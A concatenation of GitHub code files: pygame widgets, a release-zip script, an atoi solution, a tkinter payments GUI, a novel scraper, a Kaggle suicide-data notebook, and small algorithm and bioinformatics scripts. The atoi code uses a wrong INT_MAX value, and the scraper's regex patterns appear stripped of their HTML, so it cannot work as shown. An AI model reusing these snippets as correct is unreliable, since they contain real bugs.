self.screen.blit(self.image, draw_pos)\n\nclass SmartSquare(Sprite):\n def __init__(self, screen, pos, size, acc):\n self.screen = screen\n self.pos = pos\n self.size = size\n self.acc = acc\n self.surf = pygame.Surface(size)\n self.surf.fill(acc.color)\n\n def update(self, interact):\n self.surf = pygame.Surface(self.size)\n self.surf.fill(self.acc.color)\n\n def blitme(self):\n draw_pos = (self.pos[0] - self.size[0]/2, self.pos[1] - self.size[1]/2)\n self.screen.blit(self.surf, draw_pos)\n\n\nclass Text_Box(Sprite):\n\n def __init__(self, screen, size, pos, prompt, prop):\n pygame.font.init()\n self.screen = screen\n self.size = size\n self.pos = pos\n self.prop = prop\n self.active = False\n self.base_prompt = prompt\n self.active_prompt = prompt.upper()\n self.prompt = self.base_prompt\n self.font = pygame.font.Font(None, 20)\n self.text = []\n self.hidden = False\n\n def hover(self, position):\n if((self.pos[0] - (self.size[0]/2) < position[0])and\n (self.pos[0] + (self.size[0]/2) > position[0])):\n if((self.pos[1] - (self.size[1]/2) < position[1])and\n (self.pos[1] + (self.size[1]/2) > position[1])):\n return True\n else:\n return False\n else:\n return False\n\n def get_text(self):\n message = \"\"\n for t in self.text:\n message += t\n return message\n\n def set_text(self, message):\n if(message != None):\n self.text = []\n for i in range(len(message)):\n self.text.append(message[i])\n\n def update(self, interact):\n mouse_pos = interact[7]\n click = interact[0]\n inkey = interact[3]\n shift = interact[4]\n back = interact[5]\n enter = interact[6]\n\n if(self.active == False):\n self.prompt = self.base_prompt\n if((self.hover(mouse_pos))and(click)):\n self.active = True\n else:\n self.prompt = self.active_prompt\n if(enter):\n self.active = False\n self.prop(self.get_string())\n elif(back):\n self.text = self.text[0:-1]\n 
elif(inkey != None):\n if((shift)and(inkey >= 97)and(inkey <= 122)):\n self.text.append(chr(inkey-32))\n else:\n self.text.append(chr(inkey))\n\n if((click)and(self.hover(mouse_pos) == False)):\n self.active = False\n self.prop(self.get_string())\n\n def get_string(self):\n message = \"\"\n if(self.hidden):\n for i in range(len(self.text)):\n message += \"X\"\n else:\n message = self.get_text()\n\n return message\n\n def blitme(self):\n \n frame = pygame.Surface(self.size)\n frame.fill((250,0,0))\n t_pos = (self.pos[0]-(self.size[0]/2), self.pos[1]-(self.size[1]/2))\n self.screen.blit(frame, t_pos)\n \n box = pygame.Surface((self.size[0]-2, self.size[1]-2))\n box.fill((0,0,0))\n t_pos = (self.pos[0]-(self.size[0]/2)+1, self.pos[1]-(self.size[1]/2)+1)\n self.screen.blit(box, t_pos)\n\n t_pos = (self.pos[0] - (self.size[0]/2), self.pos[1] - (self.size[1]/2) - 12)\n self.screen.blit(self.font.render(self.prompt, True, (0,0,0)), t_pos)\n \n t_pos = (self.pos[0]-(self.size[0]/2)+3, self.pos[1]-(self.size[1]/2)+3) \n self.screen.blit(self.font.render(self.get_string(), True, (255,255,255)), t_pos)\n\nclass grande_door:\n def __init__(self, screen, size, event):\n enter_images = ('buttons//enter1.png', 'buttons//enter2.png')\n self.width = size[0]\n self.height = size[1]\n self.left = Sidebar(screen, [], 'images//door.png', (-512, self.height/2), True)\n self.right = Sidebar(screen, [], 'images//door.png', (self.width + 512, self.height/2), True)\n self.left.speed = 0.5\n self.right.speed = 0.5\n self.opening = False\n self.closing = False\n self.butt_enable = False\n self.butt = Button(screen, enter_images, (self.width/2, self.height/2), event, None)\n\n def close(self):\n self.left.scroll_RD()\n self.right.scroll_LU()\n self.closing = True\n\n def split(self):\n self.left.scroll_LU()\n self.right.scroll_RD()\n self.butt_enable = False\n self.opening = True\n\n def is_closed(self):\n if((self.left.pos[0] == 0)and(self.right.pos[0] == self.width)):\n return True\n else:\n return False\n\n def shut(self):\n if((self.left.pos[0] >= 0)and(self.right.pos[0] <= self.width)):\n self.left.move = False\n self.right.move = False\n self.left.pos = (0, self.height/2)\n self.right.pos = (self.width, self.height/2)\n self.butt_enable = True\n self.closing = False\n\n def jam(self):\n if((self.left.pos[0] <= -512 )and(self.right.pos[0] >= self.width + 512)):\n self.left.move = False\n self.right.move = False\n self.opening = False\n\n def update(self, interact):\n if(self.closing):\n self.shut()\n elif(self.opening):\n self.jam()\n self.right.update(interact)\n self.left.update(interact)\n if(self.butt_enable):\n self.butt.update(interact)\n\n def blitme(self):\n self.right.blitme()\n self.left.blitme()\n if(self.butt_enable):\n self.butt.blitme()\n \n \n\n\n","repo_name":"Dirker27/GamesBrowser","sub_path":"Items.py","file_name":"Items.py","file_ext":"py","file_size_in_byte":12217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"73116680167","text":"#!/usr/bin/env python3\nimport os\nimport sys\nimport glob\nimport zipfile\nimport argparse\nimport subprocess\n\n\nINCLUDE_GLOBS = [\n # documentation\n 'README.md',\n 'LICENSE.MIT',\n 'docs/*.md',\n 'docs/jxc_syntax.jxc',\n\n # editor syntax highlighting packages\n 'contrib/*/*',\n 'contrib/*.md',\n]\n\n\ndef append_filename(file_path: str, value: str) -> str:\n \"\"\"\n Adds a string to the end of a filename, inserting it just _before_ the file's extension.\n Ex. append_filename('/a/b/c/release.zip', '_1.0') == '/a/b/c/release_1.0.zip'\n \"\"\"\n file_dir, file_name = os.path.split(file_path)\n if file_name.startswith('.'):\n return os.path.join(file_dir, f'.{file_name[1:]}{value}')\n elif file_name.endswith('.'):\n return os.path.join(file_dir, f'{file_name[:-1]}{value}.')\n elif '.' not in file_name:\n return os.path.join(file_dir, f'{file_name}{value}')\n\n parts = file_name.split('.')\n assert len(parts) >= 2\n ext = parts[-1]\n parts = parts[:-1]\n parts[-1] += str(value)\n return os.path.join(file_dir, '.'.join(parts + [ext]))\n\n\ndef make_release(jxc_version: str, repo_root: str, output_path: str, amal_core_path: str, amal_cpp_path: str):\n output_path = append_filename(output_path, f'_{jxc_version}')\n zip_base_dir = f'jxc_{jxc_version}'\n\n with zipfile.ZipFile(output_path, 'w', compression=zipfile.ZIP_DEFLATED, compresslevel=9) as zf:\n for inc_glob in INCLUDE_GLOBS:\n print(repr(inc_glob))\n for path in glob.glob(os.path.join(repo_root, inc_glob)):\n file_rel_path = os.path.join(zip_base_dir, os.path.relpath(path, repo_root))\n zf.write(path, file_rel_path)\n print('\\t', repr(path), ' --> ', repr(file_rel_path))\n\n print('amalgamated_core')\n for filename in os.listdir(amal_core_path):\n file_path = os.path.join(amal_core_path, filename)\n file_zip_path = os.path.join(zip_base_dir, 'amalgamated_core_only', 'jxc', filename)\n print('\\t', repr(file_path), ' --> ', repr(file_zip_path))\n zf.write(file_path, file_zip_path)\n\n print('amalgamated_cpp')\n for filename in os.listdir(amal_cpp_path):\n file_path = os.path.join(amal_cpp_path, filename)\n file_zip_path = os.path.join(zip_base_dir, 'amalgamated_core_and_cpp_lib', 'jxc', filename)\n print('\\t', repr(file_path), ' --> ', repr(file_zip_path))\n zf.write(file_path, file_zip_path)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--source', type=str, help='Repo root directory')\n parser.add_argument('--amalgamated-core', type=str, help='Path to the amalgamated core build')\n parser.add_argument('--amalgamated-cpp', type=str, help='Path to the amalgamated cpp build')\n parser.add_argument('--output', type=str, help='Output zip file path')\n args = parser.parse_args()\n\n repo_root: str = os.path.abspath(args.source)\n if not os.path.exists(repo_root):\n raise FileNotFoundError(repo_root)\n\n amal_core: str = os.path.abspath(args.amalgamated_core)\n if not os.path.exists(amal_core):\n raise FileNotFoundError(amal_core)\n\n amal_cpp: str = os.path.abspath(args.amalgamated_cpp)\n if not os.path.exists(amal_cpp):\n raise FileNotFoundError(amal_cpp)\n\n output_path: str = os.path.abspath(args.output)\n assert not output_path.endswith('/')\n output_path_parent = os.path.dirname(output_path)\n if not os.path.exists(output_path_parent):\n output_path_parent_parent = os.path.dirname(output_path_parent)\n if os.path.exists(output_path_parent_parent) and os.path.isdir(output_path_parent_parent):\n os.makedirs(output_path_parent, exist_ok=True)\n else:\n 
raise ValueError(f\"Output path parent directory {output_path_parent_parent} does not exist\")\n\n # read the release version from the repo\n jxc_version = subprocess.check_output([ sys.executable, os.path.join(repo_root, 'tools', 'version.py') ]).strip().decode('utf-8')\n assert len(jxc_version) > 0 and len(jxc_version.split('.')) == 3\n\n make_release(jxc_version, repo_root, output_path, amal_core, amal_cpp)\n","repo_name":"juddc/jxc","sub_path":"tools/make_release_archive.py","file_name":"make_release_archive.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"53"}
+{"seq_id":"30617207413","text":"class Solution(object):\n def myAtoi(self, str):\n \"\"\"\n :type str: str\n :rtype: int\n \"\"\"\n \n # discard extra white space\n atoi_string = str.strip()\n \n INT_MAX = 2147483649\n INT_MIN = -(INT_MAX - 1)\n sign = [\"-\", \"+\"]\n \n result = \"\"\n \n for index, char in enumerate(list(atoi_string)):\n if index == 0:\n if char.isdigit() or char in sign:\n result += char\n else: \n return 0\n else:\n if char.isdigit():\n result += char\n else:\n break\n \n num = int(result) \n if num < INT_MIN or num > INT_MAX:\n return INT_MIN if num < 0 else INT_MAX\n \n return num\n\ns = Solution()\nprint(s.myAtoi(\"42\"))\nprint(s.myAtoi(\"4193 with words\"))\nprint(s.myAtoi(\"42\"))\nprint(s.myAtoi(\"42\"))","repo_name":"rakontuh/algorithms","sub_path":"Algorithms/Stanford/week-1/atoi.py","file_name":"atoi.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"}
+{"seq_id":"17285293095","text":"# Importamos los módulos necesarios\nimport tkinter as tk\nfrom tkinter import *\nimport customtkinter\nfrom customtkinter import CTkEntry, CTkButton\nfrom ttkthemes import ThemedTk\nfrom tkinter import PhotoImage\nfrom PIL import ImageTk, Image\nimport customtkinter as ctk\nfrom menu_registro import *\nfrom funciones2 import *\nfrom menu_pagos import *\nfrom consulta import *\n#from funct import *\nfrom cobranza import*\n# Creamos una ventana principal\nroot = ctk.CTk()\n\nroot.title(\"LS Software\")\nroot.geometry(\"1366x768+1+1\")\n#title_label = Label(root, text=\"LS Software\")\n\nroot.config(background=\"gray21\")\n\n# Creamos un canvas con un color de fondo y sin bordes\ncanvas = tk.Canvas(root, width=1280, height=720, bg=\"gray21\",\n highlightthickness=0)\ncanvas.pack()\n\n# Cargamos una imagen desde un archivo\n#imagen = Image.open(\"image.png\")\n# La convertimos a un formato compatible con tkinter\nphoto = PhotoImage(file=\"image.png\")\n# Creamos una imagen sobre el canvas con la foto cargada\ncanvas_image = canvas.create_image(650, 270, image=photo, anchor=CENTER)\n\nwindow = root\n# creacion del entry\nentry = ctk.CTkEntry(window, width=285, height=38,\n fg_color=\"snow2\", text_color=\"black\",\n font=(\"arial\", 20), placeholder_text=\"ej: 18123456\",\n justify=\"center\")\n# aqui la ubicamos:\nentry.place(x=676, y=621, anchor=CENTER)\n\n#funciones para bottones\ndef agregar():\n cedula = entry.get()\n print(\"accion para registrar pago de mensualidad: \" + cedula)\n\ndef buscar():\n cedula = entry.get()\n print(\"accion para buscar estado de cuenta del representante: \"\n + cedula)\n\n#Boton de agregar para registrar pagos de mensualidades\n\nadd_button = CTkButton(window, text=\"Agregar\", font=(\"arial\", 16),\n anchor=CENTER, width=10, command=agregar)\nadd_button.place(x=685, y=657, anchor=CENTER)\n\n#buscar_button = busqueda con la CI para ver estado de cuenta del representante\nbuscar_button = CTkButton(window, text=\"Buscar\",\n font=(\"arial\", 16),\n width=10, height=37, command=buscar)\nbuscar_button.place(x=855, y=621, anchor=CENTER)\n\n# Crear una instancia de Menu\nmenu_bar = Menu(root, background=\"black\")\n# Asignar la barra de menú a la ventana\nroot.config(menu=menu_bar)\n\n# Crear un elemento de menú \"Archivo\"\narchivo_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"ARCHIVO\", font=(\"calibri\", 18),\n menu=archivo_menu)\n\narchivo_menu.add_command(label=\"Nuevo\", command=nuevo)\narchivo_menu.add_command(label=\"Abrir\",command=abrir )\narchivo_menu.add_command(label=\"Importar\", command=importar)\narchivo_menu.add_command(label=\"Exportar\", command=exportar)\narchivo_menu.add_separator()\narchivo_menu.add_command(label=\"Salir\", command=root.quit)\n\n# Agregar el elemento de menú \"Registro\" a la barra de menú\nregistro_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"REGISTRO\", menu=registro_menu)\n\nregistro_menu.add_command(label=\"Representante\", command=representante)\nregistro_menu.add_command(label=\"Alumno\", command=alumno)\nregistro_menu.add_command(label=\"opcion 3\", command=opcion)\n\n# construccion del menu PAGOS\npagos_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"PAGOS\", 
menu=pagos_menu)\n\npagos_menu.add_command(label=\"Inscripcion\",command=inscripcion)\n\npagos_menu.add_command(label=\"Mensualidad\",command=pago_mensualidad)\n\n\npagos_menu.add_command(label=\"Cierre Diario\", command=cierre)\npagos_menu.add_command(label=\"Facturas\")\n\n# Agregar el elemento \"CONSULTAS\" a la barra de menú\nconsultas_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\n#creating cascade\nmenu_bar.add_cascade(label=\"CONSULTAS\", menu=consultas_menu)\n#creating elements for cascade\nconsultas_menu.add_command(label=\"Info Representante\",command=consulta_representante)\nconsultas_menu.add_command(label=\"Info Alumnos\",command=consulta_alumnos)\n#CREAR SUB_MENU MOROSIDAD\nmorosidad_menu = Menu(consultas_menu, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmorosidad_menu.add_command(label=\"Por Alumno\",command=consulta_alumnos)\nmorosidad_menu.add_command(label=\"Por curso\",command=consulta_curso)\nmorosidad_menu.add_command(label=\"TOTAL\")\nconsultas_menu.add_cascade(label=\"MOROSIDAD\", menu=morosidad_menu)\nconsultas_menu.add_command(label=\"opcion 4\") #extra option\n\n# Agregar cuentas por cobrar\ncobranza_menu = Menu(menu_bar, tearoff=0, font=(\"calibri\", 11),\n background=\"gray80\")\nmenu_bar.add_cascade(label=\"COBRANZA\", menu=cobranza_menu)\n\ncobranza_menu.add_command(label=\"Por Alumno\",command=cobranza_alumno)\ncobranza_menu.add_command(label=\"Por curso\",command=cobranza_curso)\ncobranza_menu.add_command(label=\"TOTAL\")\n\n# Iniciamos el bucle principal de la ventana\nroot.mainloop()","repo_name":"jossephtrump/ventanas","sub_path":"mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33016458718","text":"# -*- coding= utf-8 -*-\n# @Time : 2021-04-15 8:40\n# @Author : baoguo\n# @File : Day6-小说爬虫实战.py\n# @Software : PyCharm\nimport urllib.request, urllib.error\nfrom bs4 import BeautifulSoup\nimport xlwt\nimport re\nimport sqlite3\nimport gzip\nfrom io import BytesIO\n\n'''\n 需求:小说爬取 \n url = \"http://www.biquku.la/0/421/\" \n 数据爬取出现UnicodeDecodeError: \n 'utf-8' codec can't decode byte 0x8b in position 1: invalid start byte错误\n 是因为Accept-Encoding: gzip, deflate \n 需要通过gzip、BytesIO进行解压缩\n '''\n\n\ndef main():\n url = \"http://www.biquku.la/0/421/\"\n getData(url)\n # askURL(url)\n\n\nPageUrl = re.compile(r'.*')\ntName = re.compile(r'
(.*)
', re.S)\ntData = re.compile(r'
(.*?)
')\n\n\ndef getData(url):\n list = getUrl(url)\n for i in range(len(list)):\n newUrl = \"\"\n newUrl = url + str(list[i])\n html = askURL(newUrl)\n btf = BeautifulSoup(html, \"html.parser\")\n for item in btf.find_all('div', class_='content_read'):\n item = str(item)\n tname = re.findall(tName, item)[0]\n tdata = re.findall(tData, item)\n with open(\"DouLuoDaLu/\" + tname + '.txt', 'w', encoding='utf-8') as f:\n for data in tdata:\n data = \"\".join(data.split())\n f.write(data.replace('
\n\n# In[ ]:\n\n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport warnings\nwarnings.filterwarnings('ignore')\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\n\n# In[ ]:\n\n\n#dataset read operation\n#read_csv function is required to read the data.\ndata=pd.read_csv('../input/master.csv')\n\n# In[ ]:\n\n\n#show data first 5 rows\ndata.head()\n\n# In[ ]:\n\n\n#show data last 5 rows\ndata.tail()\n\n# In[ ]:\n\n\n#random rows in dataset\ndata.sample(5)\n\n# In[ ]:\n\n\ndata.sample(frac=0.1)\n\n# In[ ]:\n\n\n#Describe function includes analysis of all our numerical data. For this, count, mean, std, min,% 25,% 50,% 75, max values are given.\ndata.describe()\n\n# In[ ]:\n\n\ndata.iloc[:,1:5].describe()\n\n# In[ ]:\n\n\n#The info function shows the data types and numerical values of the features in our data set.\ndata.info()\n\n# In[ ]:\n\n\n#We will now set the headings of the feature values in the data set.\ndata.columns\n\n# In[ ]:\n\n\n#so,change the names of the column. Because there may be problems for future analysis.\ndata=data.rename(columns={'country':'Country','year':'Year','sex':'Gender','age':'Age','suicides_no':'SuicidesNo','population':'Population','suicides/100k pop':'Suicides100kPop','country-year':'CountryYear','HDI for year':'HDIForYear',' gdp_for_year ($) ':'GdpForYearMoney','gdp_per_capita ($)':'GdpPerCapitalMoney','generation':'Generation'})\n\n# In[ ]:\n\n\ndata.columns\n\n# In[ ]:\n\n\n#And, how many rows and columns are there for all data?\nprint('Data Shape :')\ndata.shape\n\n# In[ ]:\n\n\ndata.isnull().any()\n\n# In[ ]:\n\n\ndata.isnull().values.any()\n\n# In[ ]:\n\n\n#Now,I will check null on all data and If data has null, I will sum of null data's. In this way, how many missing data is in the data.\ndata.isnull().sum()\n\n# In[ ]:\n\n\n#As you can see, most of the HDIForYear value is empty. That's why I want this value deleted.\ndata=data.drop(['HDIForYear','CountryYear'],axis=1)\n\n# In[ ]:\n\n\n#Now start analysis, min year and max year will find them\nmin_year=min(data.Year)\nmax_year=max(data.Year)\nprint('Min Year :',min_year)\nprint('Max Year :',max_year)\n\n#1985 min year,2016 max year.\n\ndata_country=data[(data['Year']==min_year)]\n\ncountry_1985=data[(data['Year']==min_year)].Country.unique()\ncountry_1985_male=[]\ncountry_1985_female=[]\n\nfor country in country_1985:\n country_1985_male.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='male')]))\n country_1985_female.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='female')])) \n \n#We found the ratio of men and women who committed suicide in some countries in 1985 and we are now charting.\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_1985,x=country_1985_male,color='red')\nsns.barplot(y=country_1985,x=country_1985_female,color='yellow')\nplt.ylabel('Countries')\nplt.xlabel('Count Male vs Female')\nplt.title('1985 Year Suicide Rate Gender')\nplt.show()\n\n#Very odd all the rates came on an equal level. 
So let's do max year.\n\ndata_country=data[(data['Year']==max_year)]\n\ncountry_2016=data[(data['Year']==max_year)].Country.unique()\ncountry_2016_male=[]\ncountry_2016_female=[]\n\nfor country in country_2016:\n country_2016_male.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='male')]))\n country_2016_female.append(len(data_country[(data_country['Country']==country)&(data_country['Gender']=='female')])) \n \n#We found the ratio of men and women who committed suicide in some countries in 1985 and we are now charting.\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_2016,x=country_2016_male,color='red')\nsns.barplot(y=country_2016,x=country_2016_female,color='yellow')\nplt.ylabel('Countries')\nplt.xlabel('Count Male vs Female')\nplt.title('2016 Year Suicide Rate Gender')\nplt.show()\n\n#
While the suicide rate was widespread in more countries in 1985, this ratio has fallen considerably in 2016. Now let us examine the other features of these countries.
\n\n# In[ ]:\n\n\ndata_country=data[(data['Year']==min_year)]\n\ncountry_1985_population=[]\n\nfor country in country_1985:\n country_1985_population.append(sum(data_country[(data_country['Country']==country)].Population)) \n\n#Now year 1985 find sum population every country\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_1985,x=country_1985_population)\nplt.xlabel('Population Count')\nplt.ylabel('Countries')\nplt.title('1985 Year Sum Population for Suicide Rate')\nplt.show()\n\n#######################################################\n\ndata_country=data[(data['Year']==max_year)]\n\ncountry_2016_population=[]\n\nfor country in country_2016:\n country_2016_population.append(sum(data_country[(data_country['Country']==country)].Population)) \n\n#Now year 1985 find sum population every country\n\nplt.figure(figsize=(10,10))\nsns.barplot(y=country_2016,x=country_2016_population)\nplt.xlabel('Population Count')\nplt.ylabel('Countries')\nplt.title('2016 Year Sum Population for Suicide Rate')\nplt.show()\n\n\n#
The charts above show, for each country that appears in the data, the total population recorded in 1985 and in 2016.
\n\n# In[ ]:\n\n\nsuicideGender1985=data_country.groupby(['Country','Gender']).SuicidesNo.sum()\n\n# In[ ]:\n\n\nsuicideGender1985\n\n# In[ ]:\n\n\ndata_country=data[(data['Year']==min_year)]\n\ndata_age_5_14=[]\ndata_age_15_24=[]\ndata_age_25_34=[]\ndata_age_35_54=[]\ndata_age_55_74=[]\ndata_age_75=[]\n\nfor country in country_1985:\n data_age_5_14.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='5-14 years')]))\n data_age_15_24.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='15-24 years')]))\n data_age_25_34.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='25-34 years')]))\n data_age_35_54.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='35-54 years')]))\n data_age_55_74.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='55-74 years')]))\n data_age_75.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='75+ years')]))\n \n\n#######################################################\n\ndata_country=data[(data['Year']==max_year)]\n\ndata_age_5_14=[]\ndata_age_15_24=[]\ndata_age_25_34=[]\ndata_age_35_54=[]\ndata_age_55_74=[]\ndata_age_75=[]\n\nfor country in country_2016:\n data_age_5_14.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='5-14 years')]))\n data_age_15_24.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='15-24 years')]))\n data_age_25_34.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='25-34 years')]))\n data_age_35_54.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='35-54 years')]))\n data_age_55_74.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='55-74 years')]))\n data_age_75.append(len(data_country[(data_country['Country']==country)&(data_country['Age']=='75+ years')]))\n \n#there is an equal rate. We need to make the query process a little more complicated.\n\n# In[ ]:\n\n\nsns.countplot(data.Gender)\nplt.show()\n#there has been an even gender distribution.\n\n# In[ ]:\n\n\nplt.figure(figsize=(10,5))\nsns.countplot(data.Gender,hue=data.Age)\nplt.title('Gender & Age')\nplt.show()\n#there has been an even gender & hue age distribution.\n\n# In[ ]:\n\n\ndata.groupby('Age')['Gender'].count()\n\n# In[ ]:\n\n\nsns.barplot(x=data.groupby('Age')['Gender'].count().index,y=data.groupby('Age')['Gender'].count().values)\nplt.xticks(rotation=90)\nplt.show()\n\n# In[ ]:\n\n\nsuicidesNo=[]\nfor country in data.Country.unique():\n suicidesNo.append(sum(data[data['Country']==country].SuicidesNo)) \n\n# In[ ]:\n\n\nsuicidesNo=pd.DataFrame(suicidesNo,columns=['suicidesNo'])\ncountry=pd.DataFrame(data.Country.unique(),columns=['country'])\ndata_suicide_countr=pd.concat([suicidesNo,country],axis=1)\n#sns.barplot(x=data.Country.unique(),y=suicidesNo) \n#plt.show()\n\n# In[ ]:\n\n\ndata_suicide_countr=data_suicide_countr.sort_values(by='suicidesNo',ascending=False)\n\n# In[ ]:\n\n\nsns.barplot(y=data_suicide_countr.country[:15],x=data_suicide_countr.suicidesNo[:15])\nplt.show()\n\n#
After examining the data, we summed the total number of suicides for each country and prepared a chart that ranks the countries from the highest total to the lowest.
As a result, we have covered the seaborn library in detail and created a wide variety of graphs. If you found this kernel useful, I would be very happy if you upvote it, and I am ready to answer any questions you may have. At the bottom you can find the other kernels I have already published.
\n","repo_name":"tetherless-world/CodeGraph","sub_path":"kaggle/python_files/sample531.py","file_name":"sample531.py","file_ext":"py","file_size_in_byte":18220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"21150685799","text":"def gcd(a, b):\n x = max(a, b)\n y = min(a, b)\n while y != 0:\n x, y = y, x % y\n return x\n\n\ndef mod_mul(x, y, n):\n res = 0\n i = 1\n j = x % n\n while i <= y:\n if y & i != 0:\n res += j\n res %= n\n i *= 2\n j *= 2\n j %= n\n return res\n\n\ndef cycle(x, n):\n y = x\n count = 1\n while y != 1:\n y = mod_mul(y, x, n)\n count += 1\n return count\n\n\ndef lcm(x, y):\n return x * y // gcd(x, y)\n\n\ndef best_remainder(a):\n best = 2\n x, y = a - 1, a + 1\n for i in range(lcm(cycle(a - 1, a ** 2), cycle(a + 1, a ** 2))):\n if (x + y) % a ** 2 > best:\n best = (x + y) % a ** 2\n x = mod_mul(x, a - 1, a ** 2)\n y = mod_mul(y, a + 1, a ** 2)\n return best\n\n\ndef total(n):\n return sum([best_remainder(i) for i in range(3, n + 1)])\n","repo_name":"womri1998/ProjectEuler100s","sub_path":"problem120.py","file_name":"problem120.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"4187247313","text":"class Node:\n def __init__(self, val, next=None):\n self.val = val\n self.next = None\n\n def __str__(self):\n return f'{self.val},{self.next}'\n \nclass CLL:\n def __init__(self):\n self.head = None\n\n def insert(self, val):\n if self.head is None:\n self.head = Node(val)\n self.head.next = self.head\n return\n cur=dum=self.head\n while cur.next is not dum:\n cur=cur.next\n cur.next=Node(val)\n cur.next.next=dum\n \n def display(self,head):\n cur=self.head\n op = [str(cur.val)]\n cur=cur.next\n while cur is not self.head:\n op.append(str(cur.val))\n cur=cur.next\n return ' -> '.join(op)\n\n def splitl(self,head):\n f=s=head\n while f.next is not head and f.next.next is not head:\n f=f.next.next\n s=s.next\n print(f'second half is {self.display(s.next)}')\n\ncll=CLL()\ncll.insert(1)\ncll.insert(2)\ncll.insert(3)\ncll.insert(4)\nprint(cll.display(cll.head))\ncll.splitl(cll.head)\n","repo_name":"mahadev521/Book1","sub_path":"linkedlists/cll.py","file_name":"cll.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"42632310261","text":"#This script is part of supplementary documents of \"Impact of Introns and Homing Endonucleases on Structural Mitogenome Shaping in Hypocreales\"\n#submitted to Frontiers in Microbiology, section Fungi and Their Interactions\n#Manuscript ID: 531057\n#Authors: Paula Fonseca, Fernanda Badotti, Ruth De-Paula, Daniel Araújo, Dener Eduardo Bortolini, Luiz-Eduardo Del-Bem, Vasco Ariston De Carvalho Azevedo, \n#Bertram Brenig, Eric Roberto Guimarães Rocha Aguiar, Aristóteles Góes-Neto\n\n#This script calculates the GC content of whole genome, CDS and genes in the uORFs file\n#The files used are as follow: \n# -uORFs - Generated by Mfannot2uORFs.py script\n# -cds - Generated by getGenesGenBank2Cds.py script\n# -fasta - Donwloaded from NCBI\n\n#******************************************************************************#\n# Run the code in Python 3+ #\n#******************************************************************************#\n\n# -*- Coding: UTF-8 -*-\n#coding: utf-8\n\nimport sys\nimport os.path\nfrom os import path\n\ndef checkInputFiles():\n # #Check if all the necessary files names are passed as arguments\n if (len(sys.argv)!=4 or sys.argv[1].find(\".uORFs\")==-1 or sys.argv[2].find(\".cds\")==-1 or sys.argv[3].find(\".fasta\")==-1):\n print(\"\\n----------------------------------------------------------------------------------------------------\\n\")\n print(\"\\nUsage:\\npython GCContentORFsCdsCirc.py [file_path_name.uORFs] [file_path_name.cds] [file_path_name.fasta]\\n\")\n sys.exit(0)\n\n #Get path/file names\n uORFs_file_name=sys.argv[1]\n cds_file_name=sys.argv[2]\n fasta_file_name=sys.argv[3]\n\n #Check if path/files exists\n if (path.exists(uORFs_file_name)==False or path.exists(cds_file_name)==False or path.exists(fasta_file_name)==False):\n print(\"\\n--------------------------------------------------------------------------------------------\\n\")\n print(\"\\nOne or more files not found! Check the path and file names.\\n\")\n print(\"\\n--------------------------------------------------------------------------------------------\\n\")\n exit(0)\n\n #Open input files\n uORFs_file=open(uORFs_file_name,'r') \n cds_file=open(cds_file_name, 'r')\n fasta_file=open(fasta_file_name,'r')\n\n #Open output files. The ID filename in uORFs file is used to generate the result files ('.gct' and '.csv')\n if (os.name==\"nt\"):\n uORFs_file_name=uORFs_file_name.strip(\".\\\\\")\n output_file_name=uORFs_file_name[0:uORFs_file_name.find(\".\")]\n output_gct_file=open(output_file_name+\".gct\",'w')\n #The csv file was generated to help analyze the results. Each row of 'csv' file represent a nucleotide position in the whole genome. \n #The idea is as follows:\n #Row value= 0 = indicates the nucleotide belongs a non coding region\n #Row value= 1 = indicates the nucleotide belongs a coding region\n #Row value= 2 = indicates the nucleotide belongs a coding region and to 2 genes. 
